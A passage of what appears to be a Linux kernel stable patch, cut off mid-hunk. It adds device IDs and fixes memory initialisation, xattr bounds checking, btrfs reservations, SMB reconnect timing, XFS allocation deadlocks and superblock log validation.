+@@ -482,6 +482,7 @@ static const struct of_device_id bcm63xx_spi_of_match[] = {
+ 	{ .compatible = "brcm,bcm6358-spi", .data = &bcm6358_spi_reg_offsets },
+ 	{ },
+ };
++MODULE_DEVICE_TABLE(of, bcm63xx_spi_of_match);
+ 
+ static int bcm63xx_spi_probe(struct platform_device *pdev)
+ {
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index 477c3578e7d9e1..81a3cf92534525 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -694,6 +694,7 @@ static struct class *spidev_class;
+ static const struct spi_device_id spidev_spi_ids[] = {
+ 	{ .name = "bh2228fv" },
+ 	{ .name = "dh2228fv" },
++	{ .name = "jg10309-01" },
+ 	{ .name = "ltc2488" },
+ 	{ .name = "sx1301" },
+ 	{ .name = "bk4" },
+@@ -722,6 +723,7 @@ static int spidev_of_check(struct device *dev)
+ static const struct of_device_id spidev_dt_ids[] = {
+ 	{ .compatible = "cisco,spi-petra", .data = &spidev_of_check },
+ 	{ .compatible = "dh,dhcom-board", .data = &spidev_of_check },
++	{ .compatible = "elgin,jg10309-01", .data = &spidev_of_check },
+ 	{ .compatible = "lineartechnology,ltc2488", .data = &spidev_of_check },
+ 	{ .compatible = "lwn,bk4", .data = &spidev_of_check },
+ 	{ .compatible = "menlo,m53cpld", .data = &spidev_of_check },
+diff --git a/drivers/usb/class/usbtmc.c b/drivers/usb/class/usbtmc.c
+index 311007b1d90465..c2e666e82857c1 100644
+--- a/drivers/usb/class/usbtmc.c
++++ b/drivers/usb/class/usbtmc.c
+@@ -754,7 +754,7 @@ static struct urb *usbtmc_create_urb(void)
+ 	if (!urb)
+ 		return NULL;
+ 
+-	dmabuf = kmalloc(bufsize, GFP_KERNEL);
++	dmabuf = kzalloc(bufsize, GFP_KERNEL);
+ 	if (!dmabuf) {
+ 		usb_free_urb(urb);
+ 		return NULL;
+diff --git a/drivers/usb/serial/pl2303.c b/drivers/usb/serial/pl2303.c
+index 8949c1891164bd..05ca236023bbfe 100644
+--- a/drivers/usb/serial/pl2303.c
++++ b/drivers/usb/serial/pl2303.c
+@@ -118,6 +118,7 @@ static const struct usb_device_id id_table[] = {
+ 	{ USB_DEVICE(SMART_VENDOR_ID, SMART_PRODUCT_ID) },
+ 	{ USB_DEVICE(AT_VENDOR_ID, AT_VTKIT3_PRODUCT_ID) },
+ 	{ USB_DEVICE(IBM_VENDOR_ID, IBM_PRODUCT_ID) },
++	{ USB_DEVICE(MACROSILICON_VENDOR_ID, MACROSILICON_MS3020_PRODUCT_ID) },
+ 	{ }					/* Terminating entry */
+ };
+ 
+diff --git a/drivers/usb/serial/pl2303.h b/drivers/usb/serial/pl2303.h
+index 732f9b13ad5d59..d60eda7f6edaf8 100644
+--- a/drivers/usb/serial/pl2303.h
++++ b/drivers/usb/serial/pl2303.h
+@@ -171,3 +171,7 @@
+ /* Allied Telesis VT-Kit3 */
+ #define AT_VENDOR_ID		0x0caa
+ #define AT_VTKIT3_PRODUCT_ID	0x3001
++
++/* Macrosilicon MS3020 */
++#define MACROSILICON_VENDOR_ID		0x345f
++#define MACROSILICON_MS3020_PRODUCT_ID	0x3020
+diff --git a/fs/btrfs/block-rsv.c b/fs/btrfs/block-rsv.c
+index 4cbf386166209c..a47c8b45099698 100644
+--- a/fs/btrfs/block-rsv.c
++++ b/fs/btrfs/block-rsv.c
+@@ -384,17 +384,19 @@ void btrfs_update_global_block_rsv(struct btrfs_fs_info *fs_info)
+ 
+ 	/*
+ 	 * But we also want to reserve enough space so we can do the fallback
+-	 * global reserve for an unlink, which is an additional 5 items (see the
+-	 * comment in __unlink_start_trans for what we're modifying.)
++	 * global reserve for an unlink, which is an additional
++	 * BTRFS_UNLINK_METADATA_UNITS items.
+ 	 *
+ 	 * But we also need space for the delayed ref updates from the unlink,
+-	 * so its 10, 5 for the actual operation, and 5 for the delayed ref
+-	 * updates.
++	 * so add BTRFS_UNLINK_METADATA_UNITS units for delayed refs, one for
++	 * each unlink metadata item.
+ 	 */
+-	min_items += 10;
++	min_items += BTRFS_UNLINK_METADATA_UNITS;
+ 
+ 	num_bytes = max_t(u64, num_bytes,
+-			  btrfs_calc_insert_metadata_size(fs_info, min_items));
++			  btrfs_calc_insert_metadata_size(fs_info, min_items) +
++			  btrfs_calc_delayed_ref_bytes(fs_info,
++					       BTRFS_UNLINK_METADATA_UNITS));
+ 
+ 	spin_lock(&sinfo->lock);
+ 	spin_lock(&block_rsv->lock);
+diff --git a/fs/btrfs/block-rsv.h b/fs/btrfs/block-rsv.h
+index df87c4949d0657..fd8bfaf26da512 100644
+--- a/fs/btrfs/block-rsv.h
++++ b/fs/btrfs/block-rsv.h
+@@ -50,6 +50,18 @@ struct btrfs_block_rsv {
+ 	u64 qgroup_rsv_reserved;
+ };
+ 
++/*
++ * Number of metadata items necessary for an unlink operation:
++ *
++ * 1 for the possible orphan item
++ * 1 for the dir item
++ * 1 for the dir index
++ * 1 for the inode ref
++ * 1 for the inode
++ * 1 for the parent inode
++ */
++#define BTRFS_UNLINK_METADATA_UNITS		6
++
+ void btrfs_init_block_rsv(struct btrfs_block_rsv *rsv, enum btrfs_rsv_type type);
+ void btrfs_init_root_block_rsv(struct btrfs_root *root);
+ struct btrfs_block_rsv *btrfs_alloc_block_rsv(struct btrfs_fs_info *fs_info,
+diff --git a/fs/btrfs/delayed-ref.h b/fs/btrfs/delayed-ref.h
+index 712a6315e956b7..d325bf2948673d 100644
+--- a/fs/btrfs/delayed-ref.h
++++ b/fs/btrfs/delayed-ref.h
+@@ -253,6 +253,27 @@ extern struct kmem_cache *btrfs_delayed_extent_op_cachep;
+ int __init btrfs_delayed_ref_init(void);
+ void __cold btrfs_delayed_ref_exit(void);
+ 
++static inline u64 btrfs_calc_delayed_ref_bytes(struct btrfs_fs_info *fs_info,
++					       int num_delayed_refs)
++{
++	u64 num_bytes;
++
++	num_bytes = btrfs_calc_insert_metadata_size(fs_info, num_delayed_refs);
++
++	/*
++	 * We have to check the mount option here because we could be enabling
++	 * the free space tree for the first time and don't have the compat_ro
++	 * option set yet.
++	 *
++	 * We need extra reservations if we have the free space tree because
++	 * we'll have to modify that tree as well.
++	 */
++	if (btrfs_test_opt(fs_info, FREE_SPACE_TREE))
++		num_bytes *= 2;
++
++	return num_bytes;
++}
++
+ static inline void btrfs_init_generic_ref(struct btrfs_ref *generic_ref,
+ 				int action, u64 bytenr, u64 len, u64 parent)
+ {
+diff --git a/fs/ocfs2/xattr.c b/fs/ocfs2/xattr.c
+index 55699c5735413b..3ba40f16ef056b 100644
+--- a/fs/ocfs2/xattr.c
++++ b/fs/ocfs2/xattr.c
+@@ -1066,13 +1066,13 @@ ssize_t ocfs2_listxattr(struct dentry *dentry,
+ 	return i_ret + b_ret;
+ }
+ 
+-static int ocfs2_xattr_find_entry(int name_index,
++static int ocfs2_xattr_find_entry(struct inode *inode, int name_index,
+ 				  const char *name,
+ 				  struct ocfs2_xattr_search *xs)
+ {
+ 	struct ocfs2_xattr_entry *entry;
+ 	size_t name_len;
+-	int i, cmp = 1;
++	int i, name_offset, cmp = 1;
+ 
+ 	if (name == NULL)
+ 		return -EINVAL;
+@@ -1080,13 +1080,22 @@ static int ocfs2_xattr_find_entry(int name_index,
+ 	name_len = strlen(name);
+ 	entry = xs->here;
+ 	for (i = 0; i < le16_to_cpu(xs->header->xh_count); i++) {
++		if ((void *)entry >= xs->end) {
++			ocfs2_error(inode->i_sb, "corrupted xattr entries");
++			return -EFSCORRUPTED;
++		}
+ 		cmp = name_index - ocfs2_xattr_get_type(entry);
+ 		if (!cmp)
+ 			cmp = name_len - entry->xe_name_len;
+-		if (!cmp)
+-			cmp = memcmp(name, (xs->base +
+-				     le16_to_cpu(entry->xe_name_offset)),
+-				     name_len);
++		if (!cmp) {
++			name_offset = le16_to_cpu(entry->xe_name_offset);
++			if ((xs->base + name_offset + name_len) > xs->end) {
++				ocfs2_error(inode->i_sb,
++					    "corrupted xattr entries");
++				return -EFSCORRUPTED;
++			}
++			cmp = memcmp(name, (xs->base + name_offset), name_len);
++		}
+ 		if (cmp == 0)
+ 			break;
+ 		entry += 1;
+@@ -1170,7 +1179,7 @@ static int ocfs2_xattr_ibody_get(struct inode *inode,
+ 	xs->base = (void *)xs->header;
+ 	xs->here = xs->header->xh_entries;
+ 
+-	ret = ocfs2_xattr_find_entry(name_index, name, xs);
++	ret = ocfs2_xattr_find_entry(inode, name_index, name, xs);
+ 	if (ret)
+ 		return ret;
+ 	size = le64_to_cpu(xs->here->xe_value_size);
+@@ -2702,7 +2711,7 @@ static int ocfs2_xattr_ibody_find(struct inode *inode,
+ 
+ 	/* Find the named attribute. */
+ 	if (oi->ip_dyn_features & OCFS2_INLINE_XATTR_FL) {
+-		ret = ocfs2_xattr_find_entry(name_index, name, xs);
++		ret = ocfs2_xattr_find_entry(inode, name_index, name, xs);
+ 		if (ret && ret != -ENODATA)
+ 			return ret;
+ 		xs->not_found = ret;
+@@ -2837,7 +2846,7 @@ static int ocfs2_xattr_block_find(struct inode *inode,
+ 		xs->end = (void *)(blk_bh->b_data) + blk_bh->b_size;
+ 		xs->here = xs->header->xh_entries;
+ 
+-		ret = ocfs2_xattr_find_entry(name_index, name, xs);
++		ret = ocfs2_xattr_find_entry(inode, name_index, name, xs);
+ 	} else
+ 		ret = ocfs2_xattr_index_block_find(inode, blk_bh,
+ 						   name_index,
+diff --git a/fs/smb/client/connect.c b/fs/smb/client/connect.c
+index 21b344762d0f88..87ce71b39b7711 100644
+--- a/fs/smb/client/connect.c
++++ b/fs/smb/client/connect.c
+@@ -673,6 +673,19 @@ allocate_buffers(struct TCP_Server_Info *server)
+ static bool
+ server_unresponsive(struct TCP_Server_Info *server)
+ {
++	/*
++	 * If we're in the process of mounting a share or reconnecting a session
++	 * and the server abruptly shut down (e.g. socket wasn't closed, packet
++	 * had been ACK'ed but no SMB response), don't wait longer than 20s to
++	 * negotiate protocol.
++	 */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsInNegotiate &&
++	    time_after(jiffies, server->lstrp + 20 * HZ)) {
++		spin_unlock(&server->srv_lock);
++		cifs_reconnect(server, false);
++		return true;
++	}
+ 	/*
+ 	 * We need to wait 3 echo intervals to make sure we handle such
+ 	 * situations right:
+@@ -684,7 +697,6 @@ server_unresponsive(struct TCP_Server_Info *server)
+ 	 * 65s kernel_recvmsg times out, and we see that we haven't gotten
+ 	 *     a response in >60s.
+ 	 */
+-	spin_lock(&server->srv_lock);
+ 	if ((server->tcpStatus == CifsGood ||
+ 	    server->tcpStatus == CifsNeedNegotiate) &&
+ 	    (!server->ops->can_echo || server->ops->can_echo(server)) &&
+diff --git a/fs/xfs/libxfs/xfs_ag.c b/fs/xfs/libxfs/xfs_ag.c
+index bb0c700afe3cb1..bf47efe08a58d5 100644
+--- a/fs/xfs/libxfs/xfs_ag.c
++++ b/fs/xfs/libxfs/xfs_ag.c
+@@ -415,10 +415,12 @@ xfs_freesp_init_recs(
+ 		ASSERT(start >= mp->m_ag_prealloc_blocks);
+ 		if (start != mp->m_ag_prealloc_blocks) {
+ 			/*
+-			 * Modify first record to pad stripe align of log
++			 * Modify first record to pad stripe align of log and
++			 * bump the record count.
+ 			 */
+ 			arec->ar_blockcount = cpu_to_be32(start -
+ 						mp->m_ag_prealloc_blocks);
++			be16_add_cpu(&block->bb_numrecs, 1);
+ 			nrec = arec + 1;
+ 
+ 			/*
+@@ -429,7 +431,6 @@ xfs_freesp_init_recs(
+ 					be32_to_cpu(arec->ar_startblock) +
+ 					be32_to_cpu(arec->ar_blockcount));
+ 			arec = nrec;
+-			be16_add_cpu(&block->bb_numrecs, 1);
+ 		}
+ 		/*
+ 		 * Change record start to after the internal log
+@@ -438,15 +439,13 @@ xfs_freesp_init_recs(
+ 	}
+ 
+ 	/*
+-	 * Calculate the record block count and check for the case where
+-	 * the log might have consumed all available space in the AG. If
+-	 * so, reset the record count to 0 to avoid exposure of an invalid
+-	 * record start block.
++	 * Calculate the block count of this record; if it is nonzero,
++	 * increment the record count.
+ 	 */
+ 	arec->ar_blockcount = cpu_to_be32(id->agsize -
+ 					  be32_to_cpu(arec->ar_startblock));
+-	if (!arec->ar_blockcount)
+-		block->bb_numrecs = 0;
++	if (arec->ar_blockcount)
++		be16_add_cpu(&block->bb_numrecs, 1);
+ }
+ 
+ /*
+@@ -458,7 +457,7 @@ xfs_bnoroot_init(
+ 	struct xfs_buf		*bp,
+ 	struct aghdr_init_data	*id)
+ {
+-	xfs_btree_init_block(mp, bp, XFS_BTNUM_BNO, 0, 1, id->agno);
++	xfs_btree_init_block(mp, bp, XFS_BTNUM_BNO, 0, 0, id->agno);
+ 	xfs_freesp_init_recs(mp, bp, id);
+ }
+ 
+@@ -468,7 +467,7 @@ xfs_cntroot_init(
+ 	struct xfs_buf		*bp,
+ 	struct aghdr_init_data	*id)
+ {
+-	xfs_btree_init_block(mp, bp, XFS_BTNUM_CNT, 0, 1, id->agno);
++	xfs_btree_init_block(mp, bp, XFS_BTNUM_CNT, 0, 0, id->agno);
+ 	xfs_freesp_init_recs(mp, bp, id);
+ }
+ 
+diff --git a/fs/xfs/libxfs/xfs_alloc.c b/fs/xfs/libxfs/xfs_alloc.c
+index de79f5d07f6516..8bb024b06b9563 100644
+--- a/fs/xfs/libxfs/xfs_alloc.c
++++ b/fs/xfs/libxfs/xfs_alloc.c
+@@ -3164,10 +3164,13 @@ xfs_alloc_vextent(
+ 	xfs_alloctype_t		type;	/* input allocation type */
+ 	int			bump_rotor = 0;
+ 	xfs_agnumber_t		rotorstep = xfs_rotorstep; /* inode32 agf stepper */
++	xfs_agnumber_t		minimum_agno = 0;
+ 
+ 	mp = args->mp;
+ 	type = args->otype = args->type;
+ 	args->agbno = NULLAGBLOCK;
++	if (args->tp->t_firstblock != NULLFSBLOCK)
++		minimum_agno = XFS_FSB_TO_AGNO(mp, args->tp->t_firstblock);
+ 	/*
+ 	 * Just fix this up, for the case where the last a.g. is shorter
+ 	 * (or there's only one a.g.) and the caller couldn't easily figure
+@@ -3201,6 +3204,13 @@ xfs_alloc_vextent(
+ 		 */
+ 		args->agno = XFS_FSB_TO_AGNO(mp, args->fsbno);
+ 		args->pag = xfs_perag_get(mp, args->agno);
++
++		if (minimum_agno > args->agno) {
++			trace_xfs_alloc_vextent_skip_deadlock(args);
++			error = 0;
++			break;
++		}
++
+ 		error = xfs_alloc_fix_freelist(args, 0);
+ 		if (error) {
+ 			trace_xfs_alloc_vextent_nofix(args);
+@@ -3232,6 +3242,8 @@ xfs_alloc_vextent(
+ 	case XFS_ALLOCTYPE_FIRST_AG:
+ 		/*
+ 		 * Rotate through the allocation groups looking for a winner.
++		 * If we are blocking, we must obey minimum_agno contraints for
++		 * avoiding ABBA deadlocks on AGF locking.
+ 		 */
+ 		if (type == XFS_ALLOCTYPE_FIRST_AG) {
+ 			/*
+@@ -3239,7 +3251,7 @@ xfs_alloc_vextent(
+ 			 */
+ 			args->agno = XFS_FSB_TO_AGNO(mp, args->fsbno);
+ 			args->type = XFS_ALLOCTYPE_THIS_AG;
+-			sagno = 0;
++			sagno = minimum_agno;
+ 			flags = 0;
+ 		} else {
+ 			/*
+@@ -3248,6 +3260,7 @@ xfs_alloc_vextent(
+ 			args->agno = sagno = XFS_FSB_TO_AGNO(mp, args->fsbno);
+ 			flags = XFS_ALLOC_FLAG_TRYLOCK;
+ 		}
++
+ 		/*
+ 		 * Loop over allocation groups twice; first time with
+ 		 * trylock set, second time without.
+@@ -3276,19 +3289,21 @@ xfs_alloc_vextent(
+ 			if (args->agno == sagno &&
+ 			    type == XFS_ALLOCTYPE_START_BNO)
+ 				args->type = XFS_ALLOCTYPE_THIS_AG;
++
+ 			/*
+-			* For the first allocation, we can try any AG to get
+-			* space.  However, if we already have allocated a
+-			* block, we don't want to try AGs whose number is below
+-			* sagno. Otherwise, we may end up with out-of-order
+-			* locking of AGF, which might cause deadlock.
+-			*/
++			 * If we are try-locking, we can't deadlock on AGF
++			 * locks, so we can wrap all the way back to the first
++			 * AG. Otherwise, wrap back to the start AG so we can't
++			 * deadlock, and let the end of scan handler decide what
++			 * to do next.
++			 */
+ 			if (++(args->agno) == mp->m_sb.sb_agcount) {
+-				if (args->tp->t_firstblock != NULLFSBLOCK)
+-					args->agno = sagno;
+-				else
++				if (flags & XFS_ALLOC_FLAG_TRYLOCK)
+ 					args->agno = 0;
++				else
++					args->agno = sagno;
+ 			}
++
+ 			/*
+ 			 * Reached the starting a.g., must either be done
+ 			 * or switch to non-trylock mode.
+@@ -3300,7 +3315,14 @@ xfs_alloc_vextent(
+ 					break;
+ 				}
+ 
++				/*
++				 * Blocking pass next, so we must obey minimum
++				 * agno constraints to avoid ABBA AGF deadlocks.
++				 */
+ 				flags = 0;
++				if (minimum_agno > sagno)
++					sagno = minimum_agno;
++
+ 				if (type == XFS_ALLOCTYPE_START_BNO) {
+ 					args->agbno = XFS_FSB_TO_AGBNO(mp,
+ 						args->fsbno);
+@@ -3322,9 +3344,9 @@ xfs_alloc_vextent(
+ 		ASSERT(0);
+ 		/* NOTREACHED */
+ 	}
+-	if (args->agbno == NULLAGBLOCK)
++	if (args->agbno == NULLAGBLOCK) {
+ 		args->fsbno = NULLFSBLOCK;
+-	else {
++	} else {
+ 		args->fsbno = XFS_AGB_TO_FSB(mp, args->agno, args->agbno);
+ #ifdef DEBUG
+ 		ASSERT(args->len >= args->minlen);
+@@ -3335,6 +3357,29 @@ xfs_alloc_vextent(
+ #endif
+ 
+ 	}
++
++	/*
++	 * We end up here with a locked AGF. If we failed, the caller is likely
++	 * going to try to allocate again with different parameters, and that
++	 * can widen the AGs that are searched for free space. If we have to do
++	 * BMBT block allocation, we have to do a new allocation.
++	 *
++	 * Hence leaving this function with the AGF locked opens up potential
++	 * ABBA AGF deadlocks because a future allocation attempt in this
++	 * transaction may attempt to lock a lower number AGF.
++	 *
++	 * We can't release the AGF until the transaction is commited, so at
++	 * this point we must update the "firstblock" tracker to point at this
++	 * AG if the tracker is empty or points to a lower AG. This allows the
++	 * next allocation attempt to be modified appropriately to avoid
++	 * deadlocks.
++	 */
++	if (args->agbp &&
++	    (args->tp->t_firstblock == NULLFSBLOCK ||
++	     args->pag->pag_agno > minimum_agno)) {
++		args->tp->t_firstblock = XFS_AGB_TO_FSB(mp,
++					args->pag->pag_agno, 0);
++	}
+ 	xfs_perag_put(args->pag);
+ 	return 0;
+ error0:
+diff --git a/fs/xfs/libxfs/xfs_bmap.c b/fs/xfs/libxfs/xfs_bmap.c
+index 0d56a8d862e801..9dc33cdc2ab9ca 100644
+--- a/fs/xfs/libxfs/xfs_bmap.c
++++ b/fs/xfs/libxfs/xfs_bmap.c
+@@ -3413,21 +3413,7 @@ xfs_bmap_process_allocated_extent(
+ 	xfs_fileoff_t		orig_offset,
+ 	xfs_extlen_t		orig_length)
+ {
+-	int			nullfb;
+-
+-	nullfb = ap->tp->t_firstblock == NULLFSBLOCK;
+-
+-	/*
+-	 * check the allocation happened at the same or higher AG than
+-	 * the first block that was allocated.
+-	 */
+-	ASSERT(nullfb ||
+-		XFS_FSB_TO_AGNO(args->mp, ap->tp->t_firstblock) <=
+-		XFS_FSB_TO_AGNO(args->mp, args->fsbno));
+-
+ 	ap->blkno = args->fsbno;
+-	if (nullfb)
+-		ap->tp->t_firstblock = args->fsbno;
+ 	ap->length = args->len;
+ 	/*
+ 	 * If the extent size hint is active, we tried to round the
+@@ -4256,7 +4242,7 @@ xfs_bmapi_convert_unwritten(
+ 	return 0;
+ }
+ 
+-static inline xfs_extlen_t
++xfs_extlen_t
+ xfs_bmapi_minleft(
+ 	struct xfs_trans	*tp,
+ 	struct xfs_inode	*ip,
+diff --git a/fs/xfs/libxfs/xfs_bmap.h b/fs/xfs/libxfs/xfs_bmap.h
+index 16db95b115891c..08c16e4edc0f52 100644
+--- a/fs/xfs/libxfs/xfs_bmap.h
++++ b/fs/xfs/libxfs/xfs_bmap.h
+@@ -220,6 +220,8 @@ int	xfs_bmap_add_extent_unwritten_real(struct xfs_trans *tp,
+ 		struct xfs_inode *ip, int whichfork,
+ 		struct xfs_iext_cursor *icur, struct xfs_btree_cur **curp,
+ 		struct xfs_bmbt_irec *new, int *logflagsp);
++xfs_extlen_t xfs_bmapi_minleft(struct xfs_trans *tp, struct xfs_inode *ip,
++		int fork);
+ 
+ enum xfs_bmap_intent_type {
+ 	XFS_BMAP_MAP = 1,
+diff --git a/fs/xfs/libxfs/xfs_bmap_btree.c b/fs/xfs/libxfs/xfs_bmap_btree.c
+index cfa052d40105dc..18de4fbfef4e9b 100644
+--- a/fs/xfs/libxfs/xfs_bmap_btree.c
++++ b/fs/xfs/libxfs/xfs_bmap_btree.c
+@@ -213,18 +213,16 @@ xfs_bmbt_alloc_block(
+ 	if (args.fsbno == NULLFSBLOCK) {
+ 		args.fsbno = be64_to_cpu(start->l);
+ 		args.type = XFS_ALLOCTYPE_START_BNO;
++
+ 		/*
+-		 * Make sure there is sufficient room left in the AG to
+-		 * complete a full tree split for an extent insert.  If
+-		 * we are converting the middle part of an extent then
+-		 * we may need space for two tree splits.
+-		 *
+-		 * We are relying on the caller to make the correct block
+-		 * reservation for this operation to succeed.  If the
+-		 * reservation amount is insufficient then we may fail a
+-		 * block allocation here and corrupt the filesystem.
++		 * If we are coming here from something like unwritten extent
++		 * conversion, there has been no data extent allocation already
++		 * done, so we have to ensure that we attempt to locate the
++		 * entire set of bmbt allocations in the same AG, as
++		 * xfs_bmapi_write() would have reserved.
+ 		 */
+-		args.minleft = args.tp->t_blk_res;
++		args.minleft = xfs_bmapi_minleft(cur->bc_tp, cur->bc_ino.ip,
++						cur->bc_ino.whichfork);
+ 	} else if (cur->bc_tp->t_flags & XFS_TRANS_LOWMODE) {
+ 		args.type = XFS_ALLOCTYPE_START_BNO;
+ 	} else {
+@@ -248,6 +246,7 @@ xfs_bmbt_alloc_block(
+ 		 * successful activate the lowspace algorithm.
+ 		 */
+ 		args.fsbno = 0;
++		args.minleft = 0;
+ 		args.type = XFS_ALLOCTYPE_FIRST_AG;
+ 		error = xfs_alloc_vextent(&args);
+ 		if (error)
+diff --git a/fs/xfs/libxfs/xfs_btree.c b/fs/xfs/libxfs/xfs_btree.c
+index 4c16c8c31fcbcd..6b084b3cac83eb 100644
+--- a/fs/xfs/libxfs/xfs_btree.c
++++ b/fs/xfs/libxfs/xfs_btree.c
+@@ -2913,9 +2913,22 @@ xfs_btree_split_worker(
+ }
+ 
+ /*
+- * BMBT split requests often come in with little stack to work on. Push
++ * BMBT split requests often come in with little stack to work on so we push
+  * them off to a worker thread so there is lots of stack to use. For the other
+  * btree types, just call directly to avoid the context switch overhead here.
++ *
++ * Care must be taken here - the work queue rescuer thread introduces potential
++ * AGF <> worker queue deadlocks if the BMBT block allocation has to lock new
++ * AGFs to allocate blocks. A task being run by the rescuer could attempt to
++ * lock an AGF that is already locked by a task queued to run by the rescuer,
++ * resulting in an ABBA deadlock as the rescuer cannot run the lock holder to
++ * release it until the current thread it is running gains the lock.
++ *
++ * To avoid this issue, we only ever queue BMBT splits that don't have an AGF
++ * already locked to allocate from. The only place that doesn't hold an AGF
++ * locked is unwritten extent conversion at IO completion, but that has already
++ * been offloaded to a worker thread and hence has no stack consumption issues
++ * we have to worry about.
+  */
+ STATIC int					/* error */
+ xfs_btree_split(
+@@ -2929,7 +2942,8 @@ xfs_btree_split(
+ 	struct xfs_btree_split_args	args;
+ 	DECLARE_COMPLETION_ONSTACK(done);
+ 
+-	if (cur->bc_btnum != XFS_BTNUM_BMAP)
++	if (cur->bc_btnum != XFS_BTNUM_BMAP ||
++	    cur->bc_tp->t_firstblock == NULLFSBLOCK)
+ 		return __xfs_btree_split(cur, level, ptrp, key, curp, stat);
+ 
+ 	args.cur = cur;
+diff --git a/fs/xfs/libxfs/xfs_fs.h b/fs/xfs/libxfs/xfs_fs.h
+index 1cfd5bc6520a22..9c60ebb328b489 100644
+--- a/fs/xfs/libxfs/xfs_fs.h
++++ b/fs/xfs/libxfs/xfs_fs.h
+@@ -257,6 +257,8 @@ typedef struct xfs_fsop_resblks {
+ #define XFS_MAX_AG_BLOCKS	(XFS_MAX_AG_BYTES / XFS_MIN_BLOCKSIZE)
+ #define XFS_MAX_CRC_AG_BLOCKS	(XFS_MAX_AG_BYTES / XFS_MIN_CRC_BLOCKSIZE)
+ 
++#define XFS_MAX_AGNUMBER	((xfs_agnumber_t)(NULLAGNUMBER - 1))
++
+ /* keep the maximum size under 2^31 by a small amount */
+ #define XFS_MAX_LOG_BYTES \
+ 	((2 * 1024 * 1024 * 1024ULL) - XFS_MIN_LOG_BYTES)
+diff --git a/fs/xfs/libxfs/xfs_ialloc.c b/fs/xfs/libxfs/xfs_ialloc.c
+index 94db50eb706ac5..120dbec16f5ca8 100644
+--- a/fs/xfs/libxfs/xfs_ialloc.c
++++ b/fs/xfs/libxfs/xfs_ialloc.c
+@@ -1737,6 +1737,7 @@ xfs_dialloc(
+ 	struct xfs_perag	*pag;
+ 	struct xfs_ino_geometry	*igeo = M_IGEO(mp);
+ 	bool			ok_alloc = true;
++	bool			low_space = false;
+ 	int			flags;
+ 	xfs_ino_t		ino;
+ 
+@@ -1767,6 +1768,20 @@ xfs_dialloc(
+ 		ok_alloc = false;
+ 	}
+ 
++	/*
++	 * If we are near to ENOSPC, we want to prefer allocation from AGs that
++	 * have free inodes in them rather than use up free space allocating new
++	 * inode chunks. Hence we turn off allocation for the first non-blocking
++	 * pass through the AGs if we are near ENOSPC to consume free inodes
++	 * that we can immediately allocate, but then we allow allocation on the
++	 * second pass if we fail to find an AG with free inodes in it.
++	 */
++	if (percpu_counter_read_positive(&mp->m_fdblocks) <
++			mp->m_low_space[XFS_LOWSP_1_PCNT]) {
++		ok_alloc = false;
++		low_space = true;
++	}
++
+ 	/*
+ 	 * Loop until we find an allocation group that either has free inodes
+ 	 * or in which we can allocate some inodes.  Iterate through the
+@@ -1795,6 +1810,8 @@ xfs_dialloc(
+ 				break;
+ 			}
+ 			flags = 0;
++			if (low_space)
++				ok_alloc = true;
+ 		}
+ 		xfs_perag_put(pag);
+ 	}
+diff --git a/fs/xfs/libxfs/xfs_log_format.h b/fs/xfs/libxfs/xfs_log_format.h
+index f13e0809dc63f2..269573c828085f 100644
+--- a/fs/xfs/libxfs/xfs_log_format.h
++++ b/fs/xfs/libxfs/xfs_log_format.h
+@@ -324,7 +324,6 @@ struct xfs_inode_log_format_32 {
+ #define XFS_ILOG_DOWNER	0x200	/* change the data fork owner on replay */
+ #define XFS_ILOG_AOWNER	0x400	/* change the attr fork owner on replay */
+ 
+-
+ /*
+  * The timestamps are dirty, but not necessarily anything else in the inode
+  * core.  Unlike the other fields above this one must never make it to disk
+@@ -333,6 +332,14 @@ struct xfs_inode_log_format_32 {
+  */
+ #define XFS_ILOG_TIMESTAMP	0x4000
+ 
++/*
++ * The version field has been changed, but not necessarily anything else of
++ * interest. This must never make it to disk - it is used purely to ensure that
++ * the inode item ->precommit operation can update the fsync flag triggers
++ * in the inode item correctly.
++ */
++#define XFS_ILOG_IVERSION	0x8000
++
+ #define	XFS_ILOG_NONCORE	(XFS_ILOG_DDATA | XFS_ILOG_DEXT | \
+ 				 XFS_ILOG_DBROOT | XFS_ILOG_DEV | \
+ 				 XFS_ILOG_ADATA | XFS_ILOG_AEXT | \
+diff --git a/fs/xfs/libxfs/xfs_sb.c b/fs/xfs/libxfs/xfs_sb.c
+index bf2cca78304eb9..c24a38272cb7c8 100644
+--- a/fs/xfs/libxfs/xfs_sb.c
++++ b/fs/xfs/libxfs/xfs_sb.c
+@@ -413,7 +413,6 @@ xfs_validate_sb_common(
+ 	    sbp->sb_inodelog < XFS_DINODE_MIN_LOG			||
+ 	    sbp->sb_inodelog > XFS_DINODE_MAX_LOG			||
+ 	    sbp->sb_inodesize != (1 << sbp->sb_inodelog)		||
+-	    sbp->sb_logsunit > XLOG_MAX_RECORD_BSIZE			||
+ 	    sbp->sb_inopblock != howmany(sbp->sb_blocksize,sbp->sb_inodesize) ||
+ 	    XFS_FSB_TO_B(mp, sbp->sb_agblocks) < XFS_MIN_AG_BYTES	||
+ 	    XFS_FSB_TO_B(mp, sbp->sb_agblocks) > XFS_MAX_AG_BYTES	||
+@@ -431,6 +430,61 @@ xfs_validate_sb_common(
+ 		return -EFSCORRUPTED;
+ 	}
+ 
++	/*
++	 * Logs that are too large are not supported at all. Reject them
++	 * outright. Logs that are too small are tolerated on v4 filesystems,
++	 * but we can only check that when mounting the log. Hence we skip
++	 * those checks here.
++	 */
++	if (sbp->sb_logblocks > XFS_MAX_LOG_BLOCKS) {
++		xfs_notice(mp,
++		"Log size 0x%x blocks too large, maximum size is 0x%llx blocks",
++			 sbp->sb_logblocks, XFS_MAX_LOG_BLOCKS);
++		return -EFSCORRUPTED;
++	}
++
++	if (XFS_FSB_TO_B(mp, sbp->sb_logblocks) > XFS_MAX_LOG_BYTES) {
++		xfs_warn(mp,
++		"log size 0x%llx bytes too large, maximum size is 0x%llx bytes",
++			 XFS_FSB_TO_B(mp, sbp->sb_logblocks),
++			 XFS_MAX_LOG_BYTES);
++		return -EFSCORRUPTED;
++	}
++
++	/*
++	 * Do not allow filesystems with corrupted log sector or stripe units to
++	 * be mounted. We cannot safely size the iclogs or write to the log if
++	 * the log stripe unit is not valid.
++	 */
++	if (sbp->sb_versionnum & XFS_SB_VERSION_SECTORBIT) {
++		if (sbp->sb_logsectsize != (1U << sbp->sb_logsectlog)) {
++			xfs_notice(mp,
++			"log sector size in bytes/log2 (0x%x/0x%x) must match",
++				sbp->sb_logsectsize, 1U << sbp->sb_logsectlog);
